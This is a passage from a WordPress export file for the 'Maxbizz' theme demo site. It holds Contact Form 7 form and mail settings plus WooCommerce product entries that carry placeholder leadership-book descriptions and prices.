		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=736</link>
		<pubDate>Thu, 10 Sep 2020 08:20:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=736</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>736</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:20:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:20:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Subscribe Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=741</link>
		<pubDate>Thu, 10 Sep 2020 08:29:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=741</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="team-form flex-middle wpcf7-placeholder-light">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>741</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:29:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:29:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="team-form flex-middle wpcf7-placeholder-light">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Marketing</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/digital-marketing/</link>
		<pubDate>Thu, 01 Oct 2020 10:33:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1183</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1183</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:33:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:33:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-marketing]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="consulting"><![CDATA[Consulting]]></category>
		<category domain="product_cat" nicename="marketing"><![CDATA[Marketing]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[29.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[29.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1277]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Faster, Smarter, Louder</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/faster-smarter-louder/</link>
		<pubDate>Thu, 01 Oct 2020 10:34:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1186</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1186</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:34:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:34:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[faster-smarter-louder]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="business"><![CDATA[Business]]></category>
		<category domain="product_cat" nicename="finance"><![CDATA[Finance]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[29.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sale_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[29.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1276]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Introduction to Strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/introduction-to-strategy/</link>
		<pubDate>Thu, 01 Oct 2020 10:35:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1189</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1189</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:35:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:35:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[introduction-to-strategy]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="consulting"><![CDATA[Consulting]]></category>
